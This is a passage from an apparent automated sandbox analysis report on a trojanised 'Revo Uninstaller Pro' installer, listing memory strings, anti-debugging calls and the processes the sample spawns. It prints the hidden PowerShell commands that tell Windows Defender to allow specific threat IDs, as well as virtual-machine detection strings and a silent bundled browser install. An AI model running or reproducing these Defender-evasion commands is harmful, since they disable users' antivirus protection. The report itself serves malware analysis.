        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.152D06F00-09F6-42BE-AE6B-8D7CAD222DEF6.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.1A9D8CF1F-2C8B-2834-3EA5-D27E27E27CE56.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Fusion PC Migration AgentVMware, Inc.5.1C9EDBF7C-FAE6-5B7D-2D8E-F409BAB3C59A6.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.17854E555-C96C-46DB-8093-2021C23752DC10.0VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.1554A4225-E990-4623-B0BB-94151C05E0356.3VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1B0C15D57-1F93-4986-808F-710FFB0686A96.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.152D06F00-09F6-42BE-AE6B-8D7CAD222DEF6.1VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1C9E9233D-325C-4049-85F5-D3B9EFF024906.1VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Workstation PlayerVMware, Inc.16.064C6F385-E0E0-B5AE-819C-253D7C606A4210.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files (x86)\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files (x86)\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware vCenter Converter StandaloneVMware, Inc.6.2FA5152BC-5592-4B97-90F2-D9D5E2E4B6916.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.1554A4225-E990-4623-B0BB-94151C05E0356.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.407598576-C6E6-4823-A54E-216AF2B0297110.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMWare detected
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.4C6B0BB91-7A95-43B3-A555-39E4A98858F76.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Workstation PlayerVMware, Inc.14.0E5D4C4C9-3710-4149-AA8D-BB54149B73B46.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.17854E555-C96C-46DB-8093-2021C23752DC10.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.102C9828F-B700-A8CA-EA5C-C07D973B2D8910.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.4EC80F048-95D4-4F72-B498-C2CF528E52036.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.1367FB481-70A4-2BD9-D89F-D204ADA9525A6.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.1ACB5A703-699E-4EC4-8293-F79DB759E87E6.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.15546167B-7BB3-4E63-9071-5AE0E2FEC1E66.3
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"2.1
        Source: ya.exe, 0000001B.00000003.2029215265.00000000005F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1FBEDB58F-CC9A-4847-AAEB-AAC463FD00036.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1930AC8C3-2482-4219-AAB4-6EC8F4F28D586.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RunsOnVirtualMachine
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1C9E9233D-325C-4049-85F5-D3B9EFF024906.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1FBEDB58F-CC9A-4847-AAEB-AAC463FD00036.1QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"2.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000827A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxService.exe
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder Enterprise 20.12.0VMware InstallBuilder Enterprise"C:\Program Files\VMware InstallBuilder Enterprise 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PerfectDisk Hyper-V GuestRaxco Software, Inc.14.05960DB4E-29FC-438D-8C4A-D210BB57687110.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder for WindowsVMware, Inc.20.1FC41C749-2D65-477F-A07B-C33FE45FCB016.3VMware InstallBuilder for Windows 20.12.0VMware InstallBuilder for Windows"C:\Program Files\VMware InstallBuilder for Windows 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1452FEA7E-D933-41A7-9E0A-BFFEB327C2F410.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder EnterpriseVMware, Inc.20.1555EAE6D-8547-4704-B511-DE16BE0A88CF6.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.14136B17C-A935-4084-A910-D66968F3BAB86.1VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Horizon View ClientVMware, Inc.5.4A042C43B-8035-4A6E-A59D-59DB311495826.3{B62BB102-57D8-420A-9403-494D81F09EA6}VMware Horizon View ClientMsiExec.exe /I{CDFB31CB-DFC3-4FE7-938E-9A0DD77D7555}5.4
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.1627620AE-7984-450E-988E-150E8A9ACAB26.3VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder Professional 20.12.0VMware InstallBuilder Professional"C:\Program Files (x86)\VMware InstallBuilder Professional 20.12.0\uninstall.exe"20.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}VMware vCenter Converter StandaloneMsiExec.exe /I{DA09FD63-5AE7-4bf6-8B86-0FCA4DEA8F8F}6.2
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard2.1191E7D4A-4EB2-437E-9800-03CB58C0B8266.3QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"2.1
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Workstation PlayerVMware, Inc.14.0E0F86B18-CDF6-4CD1-BC30-47D14A43766F10.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.15499B796-E171-4F3F-8A83-4894659CCC4810.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.000000000794E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware InstallBuilder ProfessionalVMware, Inc.20.1ADE47139-1A57-4F07-B628-BF198A9B846210.0
        Source: Revo.Uninstaller.Pro.v5.3.4.exe, 00000000.00000002.2162113951.0000000006F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: QEMUFabrice Bellard5.16CEB785C-9851-E072-BDA1-6F0F1796D2B86.3QEMUQEMU"C:\Program Files\qemu\qemu-uninstall.exe"5.1
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeAPI call chain: ExitProcess graph end nodegraph_0-3986
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEAPI call chain: ExitProcess graph end nodegraph_16-23704
        Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeAPI call chain: ExitProcess graph end nodegraph_27-3638
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FE4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_002FE4F5
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00306AF3 mov eax, dword ptr fs:[00000030h]16_2_00306AF3
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_0030ACA1 GetProcessHeap,16_2_0030ACA1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FE4F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_002FE4F5
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FE643 SetUnhandledExceptionFilter,16_2_002FE643
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_002FE7FB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_002FE7FB
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXECode function: 16_2_00307BE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00307BE1
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\System32\rundll32.exe RUNDLL32.EXE SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.infJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll"Jump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bcJump to behavior
        Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeProcess created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECTJump to behavior
        Source: C:\Windows\System32\runonce.exeProcess created: C:\Windows\System32\grpconv.exe "C:\Windows\System32\grpconv.exe" -oJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\PACK.EXE C:\Users\user\AppData\Local\Temp\PACK.EXE -p123
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147781989 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147735505 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -noninteractive -windowStyle hidden -noprofile -command "Add-MpPreference -ThreatIDDefaultAction_Ids 2147814523 -ThreatIDDefaultAction_Actions Allow -Force"
        Source: C:\Users\user\AppData\Local\Temp\PACK.EXEProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe"
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x334,0x338,0x33c,0x2fc,0x340,0x6c8f7cf4,0x6c8f7d00,0x6c8f7d0c
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe "C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\user\AppData\Local\Programs\Opera" --profile-folder --language=en-GB --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3532 --package-dir-prefix="C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241209114004" --session-guid=00c18248-fcc9-4b6b-a8b7-0c50518d9022 --server-tracking-blob="MWZkNGE2YjNhYTYzYjQxNzE2YmZkZTM0YzhlOTRjYTQ1ODNlOGY3ODRmYzMyNmQ3ZDRjMGY4Zjk2MzM2NDEwODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPURXTkxTVCZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249cjEwIiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzMzNzYyMzk4LjE0MjgiLCJ1c2VyYWdlbnQiOiJOU0lTX0luZXRjIChNb3ppbGxhKSIsInV0bSI6eyJjYW1wYWlnbiI6InIxMCIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6IkRXTkxTVCJ9LCJ1dWlkIjoiNWU5Y2QwZDQtYTQ2My00MzE3LTk1ODQtNTZkMjA3ZjRlYTc0In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0C06000000000000
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6bd17cf4,0x6bd17d00,0x6bd17d0c
        Source: C:\Users\user\Downloads\OperaSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe c:\users\user\appdata\local\temp\7zs49240581\setup.exe --silent --allusers=0 --server-tracking-blob=nwm4ywuzowqyntkwzgnkmdzizdflodcxmdg5ywfhotyzngrjmwi4njg0mwe5ogmxzdbhognky2i2n2flotg3ztp7imnvdw50cnkioijvuyisimluc3rhbgxlcl9uyw1lijoit3blcmftzxr1cc5leguilcjwcm9kdwn0ijoib3blcmeilcjxdwvyesi6ii9vcgvyys9zdgfibguvd2luzg93cz91dg1fc291cmnlpurxtkxtvcz1dg1fbwvkaxvtpwfwyiz1dg1fy2ftcgfpz249cjewiiwidgltzxn0yw1wijoimtczmzc2mjm5oc4xndi4iiwidxnlcmfnzw50ijoitlnju19jbmv0yyaotw96awxsyskilcj1dg0ionsiy2ftcgfpz24ioijymtailcjtzwrpdw0ioijhcgiilcjzb3vyy2uioijev05mu1qifswidxvpzci6ijvlownkmgq0lwe0njmtndmxny05ntg0ltu2zdiwn2y0zwe3ncj9
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe c:\users\user\appdata\local\temp\7zs49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x334,0x338,0x33c,0x2fc,0x340,0x6c8f7cf4,0x6c8f7d00,0x6c8f7d0c
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe "c:\users\user\appdata\local\temp\7zs49240581\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="c:\users\user\appdata\local\programs\opera" --profile-folder --language=en-gb --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3532 --package-dir-prefix="c:\users\user\appdata\local\temp\.opera\opera installer temp\opera_package_20241209114004" --session-guid=00c18248-fcc9-4b6b-a8b7-0c50518d9022 --server-tracking-blob="mwzknge2yjnhytyzyjqxnze2ymzkztm0yzhlotrjytq1odnlogy3odrmyzmynmq3zdrjmgy4zjk2mzm2ndewodp7imnvdw50cnkioijvuyisimluc3rhbgxlcl9uyw1lijoit3blcmftzxr1cc5leguilcjwcm9kdwn0ijp7im5hbwuioijvcgvyysj9lcjxdwvyesi6ii9vcgvyys9zdgfibguvd2luzg93cz91dg1fc291cmnlpurxtkxtvcz1dg1fbwvkaxvtpwfwyiz1dg1fy2ftcgfpz249cjewiiwic3lzdgvtijp7inbsyxrmb3jtijp7imfyy2gioij4odzfnjqilcjvchn5cyi6ildpbmrvd3milcjvchn5cy12zxjzaw9uijoimtailcjwywnrywdlijoirvhfin19lcj0aw1lc3rhbxaioiixnzmznzyymzk4lje0mjgilcj1c2vyywdlbnqioijou0ltx0luzxrjichnb3ppbgxhksisinv0bsi6eyjjyw1wywlnbii6inixmcisim1lzgl1bsi6imfwyiisinnvdxjjzsi6ikrxtkxtvcj9lcj1dwlkijoinwu5y2qwzdqtytq2my00mze3ltk1odqtntzkmja3zjrlytc0in0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0c06000000000000
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe c:\users\user\appdata\local\temp\7zs49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x324,0x328,0x32c,0x300,0x330,0x6bd17cf4,0x6bd17d00,0x6bd17d0c
        Source: C:\Users\user\Downloads\OperaSetup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe c:\users\user\appdata\local\temp\7zs49240581\setup.exe --silent --allusers=0 --server-tracking-blob=nwm4ywuzowqyntkwzgnkmdzizdflodcxmdg5ywfhotyzngrjmwi4njg0mwe5ogmxzdbhognky2i2n2flotg3ztp7imnvdw50cnkioijvuyisimluc3rhbgxlcl9uyw1lijoit3blcmftzxr1cc5leguilcjwcm9kdwn0ijoib3blcmeilcjxdwvyesi6ii9vcgvyys9zdgfibguvd2luzg93cz91dg1fc291cmnlpurxtkxtvcz1dg1fbwvkaxvtpwfwyiz1dg1fy2ftcgfpz249cjewiiwidgltzxn0yw1wijoimtczmzc2mjm5oc4xndi4iiwidxnlcmfnzw50ijoitlnju19jbmv0yyaotw96awxsyskilcj1dg0ionsiy2ftcgfpz24ioijymtailcjtzwrpdw0ioijhcgiilcjzb3vyy2uioijev05mu1qifswidxvpzci6ijvlownkmgq0lwe0njmtndmxny05ntg0ltu2zdiwn2y0zwe3ncj9
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe c:\users\user\appdata\local\temp\7zs49240581\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=c:\users\user\appdata\roaming\opera software\opera stable\crash reports" "--crash-count-file=c:\users\user\appdata\roaming\opera software\opera stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=stable --annotation=plat=win32 --annotation=prod=operadesktop --annotation=ver=115.0.5322.77 --initial-client-data=0x334,0x338,0x33c,0x2fc,0x340,0x6c8f7cf4,0x6c8f7d00,0x6c8f7d0c
        Source: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe "c:\users\user\appdata\local\temp\7zs49240581\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="c:\users\user\appdata\local\programs\opera" --profile-folder --language=en-gb --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3532 --package-dir-prefix="c:\users\user\appdata\local\temp\.opera\opera installer temp\opera_package_20241209114004" --session-guid=00c18248-fcc9-4b6b-a8b7-0c50518d9022 